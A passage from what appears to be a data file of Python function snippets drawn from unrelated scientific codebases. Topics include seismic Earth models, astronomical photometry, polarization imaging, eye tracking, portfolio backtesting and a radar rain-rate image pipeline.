self.interpolation(seen_angle_splin)\n plt.figure('Trajectories interpolation')\n plt.clf()\n plt.title(\"Light deviation interpolation\", va='bottom')\n plt.xlabel('seen angle(°)')\n plt.ylabel('deviated angle(°)')\n plt.plot(seen_angle, deviated_angle, 'o')\n plt.plot(seen_angle_splin, deviated_angle_splin)\n plt.grid()\n #plt.savefig('interpolation.png', dpi=250, bbox_inches='tight')\n plt.draw()\n#\n print(\"last angle\", seen_angle[-1])\n print(\"trajectories time: %.1f\" % (time.process_time()-vrai_debut))\n\n img_matrix_x, img_matrix_y = self.create_matrices()\n\n self.img_matrix_x = img_matrix_x\n self.img_matrix_y = img_matrix_y\n\n self.img2 = self.img_pixels(self.img_debut)\n\n vrai_fin = time.process_time()\n print(\"\\nglobal computing time: %.1f\\n\" % (vrai_fin-vrai_debut))", "def ventilation_rate(self):\n # TODO: calculate based on MERV ratings/efficiency/power/etc.\n return (\n sum(v.calculate_ach(self.volume) for v in self.air_quality_measures)\n + self.outdoor_air_ventilation\n )", "def get_ppm(self):\n return self.PARA * math.pow((self.get_resistance()/ self.RZERO), -self.PARB)", "def get_ppm(self):\n return self.PARA * math.pow((self.get_resistance()/ self.RZERO), -self.PARB)", "def pulley(image):\n kernel = np.ones((3, 3), np.uint8)\n image = cv2.morphologyEx(image, cv2.MORPH_CLOSE, kernel, iterations=3)\n # image = cv2.medianBlur(image, 15)\n x, y = circular_detector(image, 25, 30)\n\n return x, y", "def contrast_curve_main(data, fwhm, instrument, position=None):\n # assign plate scale\n plate_scale_dict = {\"PHARO\": 0.025, \"ShARCS\": 0.0333}\n\n plate_scale = plate_scale_dict[instrument]\n\n #set radius_size so that radius is no larger than 1\"\n radius_size = np.min([1./plate_scale, fwhm])\n\n#DO NOT TAKE ABSOLUTE VALUE!\n contrast_result = contrast_curve_core(\n data, plate_scale, fwhm=fwhm, radius_size=radius_size, center=position\n )\n separation = contrast_result[0]\n means = contrast_result[1]\n stds = contrast_result[2]\n\n center_flux = run_ap_phot(data, fwhm, position=position)\n\n # intiialize the \"fake im fluxes\" with the central aperture flux.\n all_seps = [0]\n fake_im_fluxes = [center_flux[0]]\n fake_im_stds = [center_flux[1]]\n\n fake_ims = []\n\n for i, (all_mean, all_std) in enumerate(zip(means, stds)):\n # initialize fake fluxes for a given annulus\n fake_im_fluxes_an = []\n n_annuli = 12\n for j in range(n_annuli):\n mean = all_mean[j]\n std = all_std[j]\n x, y = np.meshgrid(np.arange(-1000, 1000), np.arange(-1000, 1000)) #was 100x100; CDD made larger for poor FWHMs\n dst = np.sqrt(x * x + y * y)\n\n # Initializing sigma and muu: size of fake injected source\n sigma = fwhm\n muu = 0.0\n\n bg_std = std\n\n noise_image = make_noise_image(\n (2000, 2000), distribution=\"gaussian\", mean=mean, stddev=bg_std\n ) #Was 200x200, but that's too small for some images because the sky annulus falls outside the fake image for high FWHM.\n # Calculating Gaussian array. tuned to a total STD=5\n fake = (\n 7 * std * np.exp(-((dst - muu) ** 2 / (2.0 * sigma**2)))\n + noise_image\n + 3\n )\n\n flux, err = run_ap_phot(fake, fwhm)\n\n # rescale to a full std of 5\n fixscale = (flux / err) / 5\n\n flux = flux / fixscale\n fake_im_fluxes_an += [flux]\n fake_im_fluxes += [np.nanmedian(fake_im_fluxes_an)]\n fake_im_stds += [np.nanstd(fake_im_fluxes_an)]\n all_seps += [separation[i]]\n\n fake_im_fluxes = np.array(fake_im_fluxes)\n\n err = 2.5 * np.log10(1.0 + (fake_im_stds / fake_im_fluxes))\n\n#DELETE THIS\n# indices = np.arange(len(fake_im_fluxes))\n# separation = fwhm * plate_scale * indices\n\n contrast = -2.5 * np.log10(fake_im_fluxes / center_flux[0])\n\n #Save contrast curve as a pandas DataFrame\n df = pd.DataFrame({'arcsec': all_seps, 'dmag': contrast, 'dmrms': err})\n\n return df #separation, contrast, err", "def calculate_soil_demand_probabilities(self):\n soil_damand_probabilities = []\n for y in range(self.controller.image_height_map.size):\n print(\"Calculating soil demand probabilities: Row: \" + str(y))\n row = []\n for x in range(self.controller.image_height_map.size):\n if self.vegetation.soil_demand.id == self.controller.soil_ids_map.image[y][x]:\n probability = 1.0\n else:\n probability = 0.0\n row.append(probability)\n soil_damand_probabilities.append(row)\n return soil_damand_probabilities", "def rain_approximation(\n pr: xr.DataArray,\n tas: xr.DataArray,\n thresh: str = \"0 degC\",\n method: str = \"binary\",\n):\n prlp = pr - snowfall_approximation(pr, tas, thresh=thresh, method=method)\n prlp.attrs[\"units\"] = pr.attrs[\"units\"]\n return prlp", "def _eventRs(self, phi, u):\n with np.errstate(all='ignore'):\n return 1/u[0] - self.Rs", "def R_P(take_off_angle, strike, dip, rake, az):\n inc = np.deg2rad(take_off_angle)\n SR = Fault_geom_SR(dip, rake)\n QR = Fault_geom_QR(strike, dip, rake, az)\n PR = Fault_geom_PR(strike, dip, rake, az)\n\n RP = SR * (3 * np.cos(inc) ** 2 - 1) - QR * np.sin(2 * inc) - PR * np.sin(inc) ** 2\n return RP", "def epi_curve(max,peakedness):\n if peakedness != 5:\n alpha_beta = [(7,5),(13,2.5),(21,1.5),(31,1),(68,0.45),(7,10),(13,5),(21,3),(31,2),(68,0.9),(7,15),(13,7.5),(21,4.5),(31,3),(68,1.35)]\n if max == 30:\n i = peakedness\n elif max == 60:\n i = peakedness + 5\n elif max == 90:\n i = peakedness + 10\n alpha = float(alpha_beta[i][0])\n beta = float(alpha_beta[i][1])\n return gamma_pdf(alpha,beta)\n elif peakedness == 5:\n return MIDAS", "def compute_miss_rate(miss_rates, fppis, fppi_level=0.1):\n\n position = bisect(fppis, fppi_level)\n position1 = position - 1\n position2 = position if position < len(miss_rates) else position1\n return 0.5 * (miss_rates[position1] + miss_rates[position2])", "def imagetestplt(thetainput,doubleopponencyinput):\n theta = thetainput\n rgcMode = doubleopponencyinput\n\n\n C = retina.sample(img,x,y,coeff[i],loc[i],rgb=True) # CENTRE(sharp retina)\n S = retina.sample(img,x,y,dcoeff[i],dloc[i],rgb=True) # SURROUND(blurred retina)\n \n if rgcMode == 0:\n pV,nV = rgc.opponency(C,S,theta)\n else:\n pV,nV = rgc.doubleopponency(C,S,theta)\n\n rIntensity,cIntensity = showNonOpponency(C,theta)\n # Construct window plots\n plt.subplot(3,1,1), plt.imshow(cv2.cvtColor(img, cv2.COLOR_BGR2RGB)), plt.title('Original test image')\n plt.xticks([]), plt.yticks([])\n plt.subplot(3,1,2), plt.imshow(cv2.cvtColor(rIntensity, cv2.COLOR_BGR2RGB)), plt.title('Backprojected R+G Intensity Response')\n plt.xticks([]), plt.yticks([])\n plt.subplot(3,1,3), plt.imshow(cv2.cvtColor(cIntensity, cv2.COLOR_BGR2RGB)), plt.title('Cortical R+G Intensity Response')\n plt.xticks([]), plt.yticks([])\n # format float to string\n thetastring = \"%.2f\" % theta\n plt.suptitle('Rectified DoG Intensity Images. Threshold:' + thetastring, fontsize=16)\n plt.show()\n\n #Generate backprojected images\n if showInverse:\n rOpponent = showBPImg(pV,nV)\n plt.imshow(cv2.cvtColor(rOpponent, cv2.COLOR_BGR2RGB)), plt.title('Backprojected Opponent Cells Output')\n plt.xticks([]), plt.yticks([])\n plt.show()\n # Cortex\n if showCortex:\n cOpponent = showCortexImg(pV,nV)\n plt.imshow(cv2.cvtColor(cOpponent, cv2.COLOR_BGR2RGB)), plt.title('Cortex Opponent Cells Output')\n plt.xticks([]), plt.yticks([])\n plt.show()", "def area(r):\n return np.pi * (r ** 2)", "def calculate_insolation_probabilities(self):\n insolation_probabilities = []\n for y in range(self.controller.image_height_map.size):\n print(\"Calculating insolation probabilities: Row: \" + str(y))\n row = []\n for x in range(self.controller.image_height_map.size):\n available_calories = self.controller.image_insolation_map.image[y][x]\n needed_calories = self.vegetation.energy_demand\n probability = self.calculate_probability(needed_calories, available_calories)\n row.append(probability)\n insolation_probabilities.append(row)\n return insolation_probabilities", "def _residual_edp(self, params):\n data = self.F**2\n model = np.absolute(self._model())**2\n sigma = self.sigma\n return (data[self.mask]-model[self.mask]) / sigma[self.mask] \n \n # The following three lines do not reproduce Sun's results, which proves\n # that the fits were done through intensity, not form factor.\n #data = self.F\n #model = np.absolute(self._model())\n #return (data - model) ", "def stretch_factor(self):\n p = self._pants_decomposition\n\n # pick a curve to iterate\n c = PantsLamination.random(p)\n # print(c)\n\n cc = (self**100) * c\n # print(self**100)\n # print(cc)\n return float(sum(abs(x) for x in (self*cc).to_vector())) / \\\n sum(abs(x) for x in cc.to_vector())", "def model_prem_iso(r):\n\n\t#- normalised radius\n\tx = r / 6371000.0\n\n\t#- march through the various depth levels -----------------------------------------------------\n\n\t#- upper crust\n\tif (r >= 6356000.0):\n\t\trho = 2.6\n\t\tvpv = 5.8\n\t\tvph = vpv\n\t\tvsv = 3.2\n\t\tvsh = vsv\n\t\teta = 1.0\n\n\t#- lower crust\n\telif (r >= 6346000.6) & (r < 6356000.0):\n\t\trho = 2.9\n\t\tvpv = 6.8\n\t\tvph = vpv\n\t\tvsv = 3.9\n\t\tvsh = vsv\n\t\teta = 1.0\n\n\t#- LID\n\telif (r >= 6291000.0) & (r < 6346000.6):\n\t\trho = 2.6910 + 0.6924 * x\n\t\tvpv = 4.1875 + 3.9382 * x\n\t\tvph = vpv\n\t\tvsv = 2.1519 + 2.3481 * x\n\t\tvsh = vsv\n\t\teta = 3.3687 - 2.4778 * x\n\n\t#- LVZ\n\telif (r >= 6151000.0) & (r < 6291000.0):\n\t\trho = 2.6910 + 0.6924 * x\n\t\tvpv = 4.1875 + 3.9382 * x\n\t\tvph = vpv\n\t\tvsv = 2.1519 + 2.3481 * x\n\t\tvsh = vsv\n\t\teta = 3.3687 - 2.4778 * x\n\n\t#- Transition zone 1\n\telif (r >= 5971000.0) & (r < 6151000.0):\n\t\trho = 7.1089 - 3.8045 * x\n\t\tvpv = 20.3926 - 12.2569 * x\n\t\tvph = vpv\n\t\tvsv = 8.9496 - 4.4597 * x\n\t\tvsh = vsv\n\t\teta = 1.0\n\n\t#- Transition zone 2\n\telif (r >= 5771000.0) & (r < 5971000.0):\n\t\trho = 11.2494 - 8.0298 * x\n\t\tvpv = 39.7027 - 32.6166 * x\n\t\tvph = vpv\n\t\tvsv = 22.3512 - 18.5856 * x\n\t\tvsh = vsv\n\t\teta = 1.0\n\n\t#- Transition zone 3\n\telif (r >= 5701000.0) & (r < 5771000.0):\n\t\trho = 5.3197 - 1.4836 * x\n\t\tvpv = 19.0957 - 9.8672 * x\n\t\tvph = vpv\n\t\tvsv = 9.9839 - 4.9324 * x\n\t\tvsh = vsv\n\t\teta = 1.0\n\n\t#- Lower mantle 1\n\telif (r >= 5600000.0) & (r < 5701000.0):\n\t\trho = 7.9565 - 6.4761 * x + 5.5283 * x**2 - 3.0807 * x**3\n\t\tvpv = 29.2766 - 23.6027 * x + 5.5242 * x**2 - 2.5514 * x**3\n\t\tvph = vpv\n\t\tvsv = 22.3459 - 17.2473 * x - 2.0834 * x**2 + 0.9783 * x**3\n\t\tvsh = vsv\n\t\teta = 1.0 \n\n\t#- Lower mantle 2\n\telif (r >= 3630000.0) & (r < 5600000.0):\n\t\trho = 7.9565 - 6.4761 * x + 5.5283 * x**2 - 3.0807 * x**3\n\t\tvpv = 24.9520 - 40.4673 * x + 51.4832 * x**2 - 26.6419 * x**3\n\t\tvph = vpv\n\t\tvsv = 11.1671 - 13.7818 * x + 17.4575 * x**2 - 9.2777 * x**3\n\t\tvsh = vsv\n\t\teta = 1.0\n\n\t#- Lower mantle 3\n\telif (r >= 3480000.0) & (r < 3630000.0):\n\t\trho = 7.9565 - 6.4761 * x + 5.5283 * x**2 - 3.0807 * x**3\n\t\tvpv = 15.3891 - 5.3181 * x + 5.5242 * x**2 - 2.5514 * x**3\n\t\tvph = vpv\n\t\tvsv = 6.9254 + 1.4672 * x - 2.0834 * x**2 + 0.9783 * x**3\n\t\tvsh = vsv\n\t\teta = 1.0\n\n\t#- Outer core\n\telif (r >= 1221000.5) & (r < 3480000.0):\n\t\trho = 12.5815 - 1.2638 * x - 3.6426 * x**2 - 5.5281 * x**3\n\t\tvpv = 11.0487 - 4.0362 * x + 4.8023 * x**2 - 13.5732 * x**3\n\t\tvph = vpv\n\t\tvsv = 0.0\n\t\tvsh = 0.0\n\t\teta = 1.0\n\n\t#- Inner Core\n\telif (r >= 0.0) & (r < 1221000.5):\n\t\trho = 13.0885 - 8.8381 * x**2\n\t\tvpv = 11.2622 - 6.3640 * x**2\n\t\tvph = vpv\n\t\tvsv = 3.6678 - 4.4475 * x**2\n\t\tvsh = vsv\n\t\teta = 1.0 \n\n\t#- convert to elastic parameters --------------------------------------------------------------\n\n\trho = 1000.0 * rho\n\tvpv = 1000.0 * vpv\n\tvph = 1000.0 * vph\n\tvsv = 1000.0 * vsv\n\tvsh = 1000.0 * vsh\n\n\tA = rho * vph**2\n\tC = rho * vpv**2\n\tN = rho * vsh**2\n\tL = rho * vsv**2\n\tF = eta * (A - 2 * L)\n\n\treturn rho, A, C, F, L, N", "def get_params(I, Stokes, imgs_polar, k, rho_one, equal_i):\n\n AOP = (0.5 * np.arctan2(Stokes[2], Stokes[1]) + np.pi / 2) / np.pi * 255\n #phi = 0.5 * np.arctan2(Stokes[2], Stokes[1])\n DOP = np.zeros((I.shape[1], I.shape[2]))#, dtype=int)\n #rho = np.zeros((I.shape[1], I.shape[2]))\n l = 0\n for i in range(I.shape[1]):\n for j in range(I.shape[2]):\n #if np.divide(np.sqrt(np.square(Stokes[2, i, j]) + np.square(Stokes[1, i, j])), Stokes[0, i, j]) > 1:\n #l += 1\n if Stokes[0, i, j] == 0:\n Stokes[0, i, j] = 1\n DOP[i, j] = np.divide(np.sqrt(np.square(Stokes[2, i, j]) + np.square(Stokes[1, i, j])), Stokes[0, i, j])\n #rho[i, j] = np.divide(np.sqrt(np.square(Stokes[2, i, j]) + np.square(Stokes[1, i, j])), Stokes[0, i, j])\n \"\"\"if DOP[i, j] == 0:\n equal_i.append([I[0, i, j], I[1, i, j], I[2, i, j], I[3, i, j]])\"\"\"\n\n #rho_one.append(l)\n\n DOP = DOP / np.max(DOP) * 255\n #rho = rho\n\n \"\"\"im_cos = rho * np.cos(2*phi)\n im_cos = im_cos / np.max(im_cos) * 255\n im_sin = rho * np.sin(2*phi)\n im_sin = im_sin / np.max(im_sin) * 255\n\n # Saving the image in the format DOP*sin(AOP) and DOP*cos(AOP)\n\n if not os.path.exists(path_process + \"Cos/\"):\n os.mkdir(path_process + \"Cos/\")\n imageio.imwrite(path_process + \"Cos/\" + imgs_polar[k].split(\".\")[0] + \"_cos.png\", im_cos)\n if not os.path.exists(path_process + \"Sin/\"):\n os.mkdir(path_process + \"Sin/\")\n imageio.imwrite(path_process + \"Sin/\" + imgs_polar[k].split(\".\")[0] + \"_sin.png\", im_sin)\"\"\"\n\n # Saving the AOP and DOP\n\n if not os.path.exists(path_process + \"AOP/\"):\n os.mkdir(path_process + \"AOP/\")\n imageio.imwrite(path_process + \"AOP/\" + imgs_polar[k].split(\".\")[0] + \"_AOP.png\", AOP)\n if not os.path.exists(path_process + \"DOP/\"):\n os.mkdir(path_process + \"DOP/\")\n imageio.imwrite(path_process + \"DOP/\" + imgs_polar[k].split(\".\")[0] + \"_DOP.png\", DOP)\n\n #AOP.astype(int)\n #DOP.astype(int)\n\n return AOP, DOP#, im_cos, im_sin, rho, phi", "def getPupil(self, image, threshold=0, pupilMinimum=10, pupilMaximum=50):\n # Create the output variable.\n bestPupil = -1\n bestProps = {}\n ellipses = []\n centers = []\n\n # Create variables to plot the regression data.\n # TIPS: You must select two blob properties and add their values in\n # the following lists. Then, call the private method\n # __plotData() in the end of your implementation.\n x = []\n y = []\n\n # Grayscale image.\n grayscale = image.copy()\n if len(grayscale.shape) == 3:\n grayscale = cv2.cvtColor(grayscale, cv2.COLOR_BGR2GRAY)\n\n # Define the minimum and maximum size of the detected blob.\n pupilMinimum = int(round(math.pi * math.pow(pupilMinimum, 2)))\n pupilMaximum = int(round(math.pi * math.pow(pupilMaximum, 2)))\n\n \n # Preprocessing\n #kernel = cv2.getStructuringElement(cv2.MORPH_RECT,(7,7))\n #grayscale = cv2.morphologyEx(grayscale, cv2.MORPH_OPEN, kernel)\n \n #kernel = cv2.getStructuringElement(cv2.MORPH_RECT,(15,15))\n #grayscale = cv2.morphologyEx(grayscale, cv2.MORPH_CLOSE, kernel) \n \n # Create a binary image.\n _, thres = cv2.threshold(grayscale, threshold, 255,\n cv2.THRESH_BINARY_INV)\n #thres = self.__GetAutoThresholdPupil(grayscale)\n \n #print thres\n # Find blobs in the input image.\n _, contours, hierarchy = cv2.findContours(thres, cv2.RETR_LIST,\n cv2.CHAIN_APPROX_SIMPLE)\n\n #<!--------------------------------------------------------------------------->\n #<!-- YOUR CODE HERE -->\n #<!--------------------------------------------------------------------------->\n for blob in contours:\n props = self.Props.calcContourProperties(blob,[\"centroid\", \"area\", \"extend\", \"circularity\",\"compactness\",\"epr\"]) \n # Is candidate\n if 500.0 < props[\"Area\"] and props[\"Area\"] < 8000.0 and 0.65 < props[\"Extend\"] and props[\"Extend\"] < 0.9: \n centers.append(props[\"Centroid\"])\n if len(blob) > 4:\n ellipses.append(cv2.fitEllipse(blob))\n x.append(props[\"Area\"])\n y.append(props[\"Extend\"]) \n else:\n ellipses.append(cv2.minAreaRect(blob))\n x.append(props[\"Area\"])\n y.append(props[\"Extend\"])\n compactnessRatio = props[\"Compactness\"]\n epr = props [\"Epr\"]\n \n print props[\"Circularity\"]\n \n if props[\"Circularity\"] > 0.5 and compactnessRatio>0.5 and epr>0.5:\n # Update best props \n if bestPupil == -1:\n bestProps = props \n bestPupil = len(ellipses) - 1 \n else: \n if props[\"Circularity\"] > bestProps[\"Circularity\"]:\n bestProps = props \n bestPupil = len(ellipses) - 1 \n\n # Return the final result.\n return ellipses, centers, bestPupil", "def curve_with_hillcoef(ph, pka, hillcoef):\n# return hillcoef * ph - pka\n return 1/(1+10**(hillcoef*(pka-ph)))", "def bern_max_metric(pipe_diameter, delta_p):\n\n rho = 1000 # density of water kg/m^3\n flow_rate_max = ((math.pi * (pipe_diameter**2)) / 4) * math.sqrt((2 * delta_p) / rho)\n\n return flow_rate_max", "def cppi(risky_r, safe_r=None, m=3, start=initial, floor=0.8, riskfree_rate=risk_free_rate, drawdown=None):\n # set up the CPPI parameters\n dates = risky_r.index\n n_steps = len(dates)\n account_value = start\n floor_value = start*floor\n peak = account_value\n if isinstance(risky_r, pd.Series): \n risky_r = pd.DataFrame(risky_r, columns=[\"R\"])\n\n if safe_r is None:\n safe_r = pd.DataFrame().reindex_like(risky_r)\n safe_r.values[:] = riskfree_rate/12 # fast way to set all values to a number\n # set up some DataFrames for saving intermediate values\n account_history = pd.DataFrame().reindex_like(risky_r)\n risky_w_history = pd.DataFrame().reindex_like(risky_r)\n cushion_history = pd.DataFrame().reindex_like(risky_r)\n floorval_history = pd.DataFrame().reindex_like(risky_r)\n peak_history = pd.DataFrame().reindex_like(risky_r)\n\n for step in range(n_steps):\n if drawdown is not None:\n peak = np.maximum(peak, account_value)\n floor_value = peak*(1-drawdown)\n cushion = (account_value - floor_value)/account_value\n risky_w = m*cushion\n risky_w = np.minimum(risky_w, 1)\n risky_w = np.maximum(risky_w, 0)\n safe_w = 1-risky_w\n risky_alloc = account_value*risky_w\n safe_alloc = account_value*safe_w\n # recompute the new account value at the end of this step\n account_value = risky_alloc*(1+risky_r.iloc[step]) + safe_alloc*(1+safe_r.iloc[step])\n # save the histories for analysis and plotting\n cushion_history.iloc[step] = cushion\n risky_w_history.iloc[step] = risky_w\n account_history.iloc[step] = account_value\n floorval_history.iloc[step] = floor_value\n peak_history.iloc[step] = peak\n risky_wealth = start*(1+risky_r).cumprod()\n backtest_result = {\n \"Wealth\": account_history,\n \"Risky Wealth\": risky_wealth, \n \"Risk Budget\": cushion_history,\n \"Risky Allocation\": risky_w_history,\n \"m\": m,\n \"start\": start,\n \"floor\": floor,\n \"risky_r\":risky_r,\n \"safe_r\": safe_r,\n \"drawdown\": drawdown,\n \"peak\": peak_history,\n \"floor\": floorval_history\n }\n return backtest_result", "def get_mortality_rate(period, species):\n\n initial_value = 0.05\n mortality_decrease_rate = 0.97 # 0.97 ^ 50 .==' 0.218\n r = initial_value * (mortality_decrease_rate ** period)\n return 1 - r", "def workflow(now, realtime):\n szx = 7000\n szy = 3500\n # Create the image data\n imgdata = np.zeros((szy, szx), 'u1')\n sts = now - datetime.timedelta(minutes=2)\n metadata = {'start_valid': sts.strftime(\"%Y-%m-%dT%H:%M:%SZ\"),\n 'end_valid': now.strftime(\"%Y-%m-%dT%H:%M:%SZ\"),\n 'product': 'a2m',\n 'units': '0.02 mm'}\n\n gribfn = mrms.fetch('PrecipRate', now)\n if gribfn is None:\n print((\"mrms_rainrate_comp.py NODATA for PrecipRate: %s\"\n ) % (now.strftime(\"%Y-%m-%dT%H:%MZ\"),))\n return\n\n # http://www.nssl.noaa.gov/projects/mrms/operational/tables.php\n # Says units are mm/hr\n fp = gzip.GzipFile(gribfn, 'rb')\n (_, tmpfn) = tempfile.mkstemp()\n tmpfp = open(tmpfn, 'wb')\n tmpfp.write(fp.read())\n tmpfp.close()\n grbs = pygrib.open(tmpfn)\n grb = grbs[1]\n os.unlink(tmpfn)\n os.unlink(gribfn)\n\n val = grb['values']\n # Convert into units of 0.1 mm accumulation\n val = val / 60.0 * 2.0 * 50.0\n val = np.where(val < 0., 255., val)\n imgdata[:, :] = np.flipud(val.astype('int'))\n\n (tmpfp, tmpfn) = tempfile.mkstemp()\n\n # Create Image\n png = Image.fromarray(np.flipud(imgdata))\n png.putpalette(mrms.make_colorramp())\n png.save('%s.png' % (tmpfn,))\n\n mrms.write_worldfile('%s.wld' % (tmpfn,))\n # Inject WLD file\n routes = \"c\" if realtime else \"\"\n prefix = 'a2m'\n pqstr = (\"/home/ldm/bin/pqinsert -i -p 'plot a%s %s \"\n \"gis/images/4326/mrms/%s.wld GIS/mrms/%s_%s.wld wld' %s.wld\"\n \"\") % (routes, now.strftime(\"%Y%m%d%H%M\"), prefix, prefix,\n now.strftime(\"%Y%m%d%H%M\"), tmpfn)\n subprocess.call(pqstr, shell=True)\n # Now we inject into LDM\n pqstr = (\"/home/ldm/bin/pqinsert -i -p 'plot a%s %s \"\n \"gis/images/4326/mrms/%s.png GIS/mrms/%s_%s.png png' %s.png\"\n \"\") % (routes, now.strftime(\"%Y%m%d%H%M\"), prefix, prefix,\n now.strftime(\"%Y%m%d%H%M\"), tmpfn)\n subprocess.call(pqstr, shell=True)\n\n if realtime:\n # Create 900913 image\n cmd = (\"gdalwarp -s_srs EPSG:4326 -t_srs EPSG:3857 -q -of GTiff \"\n \"-tr 1000.0 1000.0 %s.png %s.tif\") % (tmpfn, tmpfn)\n subprocess.call(cmd, shell=True)\n # Insert into LDM\n pqstr = (\"/home/ldm/bin/pqinsert -i -p 'plot c %s \"\n \"gis/images/900913/mrms/%s.tif GIS/mrms/%s_%s.tif tif' %s.tif\"\n \"\") % (now.strftime(\"%Y%m%d%H%M\"), prefix, prefix,\n now.strftime(\"%Y%m%d%H%M\"), tmpfn)\n subprocess.call(pqstr, shell=True)\n\n j = open(\"%s.json\" % (tmpfn,), 'w')\n j.write(json.dumps(dict(meta=metadata)))\n j.close()\n # Insert into LDM\n pqstr = (\"/home/ldm/bin/pqinsert -i -p 'plot c %s \"\n \"gis/images/4326/mrms/%s.json GIS/mrms/%s_%s.json json' \"\n \"%s.json\") % (now.strftime(\"%Y%m%d%H%M\"), prefix, prefix,\n now.strftime(\"%Y%m%d%H%M\"), tmpfn)\n subprocess.call(pqstr, shell=True)\n for suffix in ['tif', 'json', 'png', 'wld']:\n if os.path.isfile(\"%s.%s\" % (tmpfn, suffix)):\n os.unlink('%s.%s' % (tmpfn, suffix))\n\n os.close(tmpfp)\n os.unlink(tmpfn)", "def beamarea_pix(self):\n beamsigma1 = self.header['BMAJ'] / self.wcs.wcs.cdelt[0]\n beamsigma2 = self.header['BMIN'] / self.wcs.wcs.cdelt[0]\n return (np.pi * beamsigma1 * beamsigma2) / (4 * np.log(2))", "def buldge_disk_ratio(kwargs_buldge_disk):\n kwargs_bd = copy.deepcopy(kwargs_buldge_disk)\n kwargs_bd['center_x'] = 0\n kwargs_bd['center_y'] = 0\n deltaPix = 0.05\n numPix = 200\n x_grid, y_grid = util.make_grid(numPix, deltaPix)\n from lenstronomy.LightModel.Profiles.sersic import BuldgeDisk\n bd_class = BuldgeDisk()\n light_grid = bd_class.function(x_grid, y_grid, **kwargs_bd)\n light_tot = np.sum(light_grid)\n kwargs_bd['I0_d'] = 0\n light_grid = bd_class.function(x_grid, y_grid, **kwargs_bd)\n light_buldge = np.sum(light_grid)\n return light_tot, light_buldge", "def _calculate_tail_probability(self, x, rate):\n return 1 - stats.poisson.cdf(x - 1, rate)", "def reprographie():\n nombreDePhotocopie = int(input(\"Entrez le nombre de photocopie a effectuer \"))\n PREMIER_PRIX = 0.10\n DEUXIEME_PRIX = 0.09\n TROISIEME_PRIX = 0.08\n PREMIERE_TRANCHE = 10\n DEUXIEME_TRANCHE = 20\n TROISIEME_TRANCHE = 30\n resultat = 0\n if(nombreDePhotocopie>TROISIEME_TRANCHE):\n resultat = DEUXIEME_TRANCHE*DEUXIEME_PRIX+1+(nombreDePhotocopie-30)*TROISIEME_PRIX\n elif(nombreDePhotocopie<=TROISIEME_TRANCHE):\n if(nombreDePhotocopie/10>1):\n resultat = (nombreDePhotocopie-10)*DEUXIEME_PRIX+(PREMIERE_TRANCHE*PREMIER_PRIX)\n else:\n resultat = nombreDePhotocopie*PREMIER_PRIX\n return resultat", "def Ag_density():\n # initialise no infection default for the number of infections required\n agcurves = [np.zeros(cf.endtime + 1) for inf in cf.tinf]\n # for every infection, calculate its individual effect per timepoint\n for i in range(len(cf.tinf)):\n pag = cf.dose[i] # peak\n tai = 0 # tnow after infection\n while pag > 0.01:\n pag = cf.dose[i] * math.exp(-float(tai) / cf.tdecay)\n agcurves[i][cf.tinf[i] + tai] = pag\n tai += 1\n if cf.tinf[i] + tai >= cf.endtime:\n break\n # sum up all effects\n agcurve_uncapped = np.sum(agcurves, axis=0)\n # set all values above 100% to 100%\n agcurve = [np.min([val, 1]) for val in agcurve_uncapped]\n\n return agcurve", "def curve_no_hillcoef(ph, pka):\n# return ph - pka\n return 1/(10**(pka-ph)+1)", "def _prorata_rate(self, days_used, days_in_month):\n return (100 * days_used // days_in_month) / 100.0", "def estimate_arpu(x):\n arpu = 0\n if x['mean_luminosity_km2'] > 5:\n # #10 year time horizon\n # for i in range(0, 10):\n # #discounted_arpu = (arpu*months) / (1 + discount_rate) ** year\n # arpu += (\n # (20*12) / (1 + 0.03) ** i\n # )\n return 20 * 12 * 10#arpu\n elif x['mean_luminosity_km2'] > 1:\n # for i in range(0, 10):\n # #discounted_arpu = (arpu*months) / (1 + discount_rate) ** year\n # arpu += (\n # (5*12) / (1 + 0.03) ** i\n # )\n return 5 * 12 * 10#arpu\n else:\n # for i in range(0, 10):\n # #discounted_arpu = (arpu*months) / (1 + discount_rate) ** year\n # arpu += (\n # (2*12) / (1 + 0.03) ** i\n # )\n return 2 * 12 * 10#arpu", "def deadPointAdd(self, materials, materialNumber, ratioArray):\t\n\t\t\n\t\t\"\"\"sort the ratio arry in order\"\"\"\n\t\tsorted(ratioArray)\n\t\t\n\t\t\"\"\"find the jumpping bound\"\"\"\n\t\tboundRatio = []\n\t\tboundRatio.append(0.0)\n\t\tfor ratio in ratioArray:\n\t\t\tboundRatio.append((ratio[0] + ratio[1]) / 2.0 / 100.0)\n\t\tboundRatio.append(1.0)\n\t\t\n\t\t\"\"\"add the beginning and finishing part in functionRatio, and put ratioArray in it\"\"\"\n\t\tlowestBound = ratioArray[0][0]\n\t\tupperestBound = ratioArray[-1][1]\n\t\t\n\t\tfunctionRatio = []\n\t\tfunctionRatio.append((0, lowestBound / 100.0))\n\t\tfor i in range(len(ratioArray) - 1):\n\t\t\tfunctionRatio.append((ratioArray[i][1] / 100.0, ratioArray[i + 1][0] / 100.0))\n\t\tfunctionRatio.append((upperestBound, 100))\n\t\t\t\n\t\t\"\"\"\"define function for each area, calculate k(gradience) and b\"\"\"\n\t\tlinearGradient = []\n\t\tlinearOffset = []\n\t\tfor i in range(len(boundRatio) - 1):\n\t\t\tx1 = boundRatio[i]\n\t\t\tx2 = boundRatio[i + 1]\n\t\t\ty1 = functionRatio[i][0]\n\t\t\ty2 = functionRatio[i][1]\n\t\t\tlinearGradient.append((y2 - y1) / (x2 - x1))\n\t\t\tlinearOffset.append((y1 * x2 - y2 * x1) / (x2 - x1))\n\t\t\t\n\t\t\"\"\"calculate the actual composition using the linear map\"\"\"\n\t\tvolumeShape = self.volumeComposition[materialNumber].shape\n\t\tfor i in range(volumeShape[0]):\n\t\t\tfor j in range(volumeShape[1]):\n\t\t\t\tfor k in range(volumeShape[2]):\n\t\t\t\t\tfor l in range(len(boundRatio) - 1):\n\t\t\t\t\t\tif self.volumeComposition[materialNumber][i][j][k] > 0.00001 + boundRatio[l] and self.volumeComposition[materialNumber][i][j][k] <= + boundRatio[l + 1]:\n\t\t\t\t\t\t\t\"\"\"\"apply the linear function\"\"\"\t\n\t\t\t\t\t\t\tself.volumeComposition[materialNumber][i][j][k] = linearGradient[l] * self.volumeComposition[materialNumber][i][j][k] + linearOffset[l]\n\t\t\t\t\t\t\tself.volumeComposition[0][i][j][k] = 1.0 - self.volumeComposition[materialNumber][i][j][k]\n\n\t\t\"\"\"convert volumeComposition into RGB\"\"\"\t\t\t\t\t\t\n\t\tlayersR = list()\n\t\tlayersG = list()\n\t\tlayersB = list()\n\t\t\n\t\tvolumeGeneral = 